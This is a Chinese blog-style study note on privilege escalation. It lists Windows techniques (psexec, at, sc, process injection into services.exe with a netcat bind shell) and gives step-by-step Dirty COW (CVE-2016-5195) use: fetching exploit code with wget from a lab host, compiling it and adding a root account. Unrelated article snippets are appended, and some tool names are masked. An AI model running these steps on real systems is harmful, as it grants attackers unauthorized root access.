知識整理 簡單的系統提權

2021-10-01 11:03:46 字數 2946 閱讀 3990

髒牛提權

髒牛提權步驟

vmware共享檔案

本地提權

系統賬號

在cmd的命令互動介面輸入p***ec

輸入命令p***ec -i -s cmd即可開啟 乙個具有系統許可權的互動介面

輸入命令at 17:23/interactive cmd即可在規定的時間開啟 乙個具有系統許可權的互動介面[外鏈轉存失敗,源站可能有防盜煉機制,建議將儲存下來直接上傳(img-zelg085e-1576240645371)(picture/image-20191208173421495.png)]

sc start syscmd # 執行叫做syscmd的服務,服務名稱可自定

需要將pinjector.exe放入路徑c:\windows\system32中,然後在命令互動介面輸入pinjector

使用injector -l可以檢視系統中的服務、服務程序號、服務許可權

比如以services.exe為目標,其pid:968,注入到services中

則命令為injector -p 968 cmd 4444

使用netcat連線到目標機

優點:非常隱蔽

缺點:當對方重新啟動服務後,就造成注入失效,需要重新注入

關於windows的一些整合工具在kali的此目錄下/usr/share/windows-binaries

其中的whoami是乙個適用於32系統的程式

髒牛(dirty cow)是linux核心的乙個提權漏洞,攻擊者可以利用這個漏洞獲取root許可權。之所以叫dirty cow,因為這個漏洞利用了linux的copy-on-write機制。髒牛的cve編號是cve-2016-5195。

危害:低許可權使用者利用該漏洞可以在眾多linux系統上實現本地提權

簡要分析:該漏洞具體為,get_user_page核心函式在處理copy-on-write(以下使用cow表示)的過程中,可能產出競態條件造成cow過程被破壞,導致出現寫資料到程序位址空間內唯讀記憶體區域的機會。修改su或者passwd程式就可以達到root的目的。

以下是主流發行版修復之後的核心版本,如果核心版本低於列表裡的版本,表示還存在髒牛漏洞

centos7 /rhel7    3.10.0-327.36.3.el7

cetnos6/rhel6 2.6.32-642.6.2.el6

ubuntu 16.10 4.8.0-26.28

ubuntu 16.04 4.4.0-45.66

ubuntu 14.04 3.13.0-100.147

debian 8 3.16.36-1+deb8u2

debian 7 3.2.82-1

在測試機上使用python -m ******httpserver 80開始web服務,將dirty.c的檔案放在目錄下,因為不同主機的編譯結果不同,最好是在目標機上進行編譯

wget 192.168.72.141/dirty.c ~/desktop/
在目標機上,使用gcc對dirty.c的檔案進行編譯,得到dirty,並執行

gcc -pthread dirty.c -o dirty -lcrypt

dirty

dirty程式修改了/etc/passwd檔案,生成了乙個新的root賬戶,username:firefart;password:nbnb,切換後就擁有了管理員許可權

還原passwd中的使用者資訊

在/tmp中多了個passwd.bak的檔案,記錄髒牛前的使用者資訊

使用命令還原passwd檔案,以前的root使用者恢復

mv /tmp/passwd.bak /etc/passwd
在vmware的虛擬機器設定中,選項中開啟,並新增物理機上需要與虛擬機器共享共享的資料夾

linux:/mnt/hgfs/

windows:\\vmware-host\shared folders

髒牛**:

內網提權 系統篇

windows 系統漏洞 ms系列 ms08 067 rpcms09 012 pr.exe 巴西烤肉提權 ms09 020 iis5 6 ms12 202 rdp藍屏 ms17 010 永恆之藍 wannacry cve 2019 0708 rdp 命令執行 粘滯鍵提權 sethc.exe 使用cm...

MySQL提權簡單方法

孤水繞城 s blog 前不久網上公開了乙個mysql func的漏洞,講的是使用mysql建立乙個自定義的函式,然後通過這個函式來攻擊伺服器。最早看到相關的報道是在o otik上,但是公布的是針對unix系統的exploit,並且成功率也不是很高.而近期,國內有高手放出針對win系統的相關文章,於...

Linux系統之提權操作

1 su 切換至xx使用者,輸入xx使用者的密碼。用法 su xx使用者 注 1 su命令後不跟xx使用者或只跟 預設為root。2 登入沒有時間限制。3 如果只是對一條命令執行root許可權的,加 c 即可。4 多使用者使用系統時,最好採用sudo提權,可以避免root密碼洩露。選項 1 m,p ...